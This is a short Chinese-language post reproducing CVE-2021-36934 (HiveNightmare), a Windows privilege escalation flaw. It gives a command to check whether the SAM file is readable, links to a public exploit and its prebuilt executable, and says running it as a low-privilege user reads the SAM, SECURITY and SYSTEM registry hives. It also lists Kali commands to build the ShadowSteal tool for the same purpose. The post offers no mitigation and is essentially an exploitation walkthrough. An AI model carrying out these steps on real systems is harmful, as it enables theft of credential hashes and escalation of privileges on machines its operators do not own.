CVE-2021-36934 Windows提权漏洞复现

admin

执行以下命令：
[pre]
icacls C:\windows\system32\config\sam
[/pre]

如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受测试。

漏洞复现
EXP 地址为：https://github.com/GossiTheDog/HiveNightmare
作者编译好的 exe 文件：

https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe

直接将作者编译好的 HiveNightmare.exe 拷贝到目标系统上执行，这里以 Windows 10  为例。

可以看到在低权限账号下，成功利用 CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。
在kali下复现
[pre]
sudo apt-get install nim
nimble install zippy argparse
nimble install winim
sudo apt-get install mingw-w64
git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
make && cd bin/ && ls -l
[/pre]
将编译好的 ShadowSteal.exe 放到目标系统上直接执行即可。